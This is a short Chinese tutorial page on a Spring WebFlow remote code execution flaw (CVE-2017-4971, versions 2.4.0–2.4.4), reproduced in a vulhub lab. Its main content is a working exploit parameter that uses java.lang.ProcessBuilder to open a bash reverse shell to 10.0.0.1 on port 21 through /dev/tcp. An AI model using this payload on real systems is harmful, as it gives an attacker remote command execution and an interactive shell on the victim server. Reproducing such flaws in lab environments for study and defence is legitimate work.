zl程序教程

您现在的位置是:首页 >  后端

当前栏目

spring框架漏洞整理(Spring WebFlow远程代码执行)

Spring漏洞框架 远程 整理 代码执行
2023-09-11 14:19:27 时间

Spring WebFlow远程代码执行
(CVE-2017-4971)Spring WebFlow 远程代码执行
Spring WebFlow 远程代码执行影响范围:Spring WebFlow 2.4.0 - 2.4.4

Spring WebFlow 远程代码执行复现环境:vulhub

Spring WebFlow 远程代码执行复现过程:

# 数据包添加一个带漏洞的参数即可 ,spring框架漏洞整理(Spring WebFlow 远程代码执行)
_(new java.lang.ProcessBuilder("bash","-c","bash -i >& /dev/tcp/10.0.0.1/21 0>&1")).start()=xxxx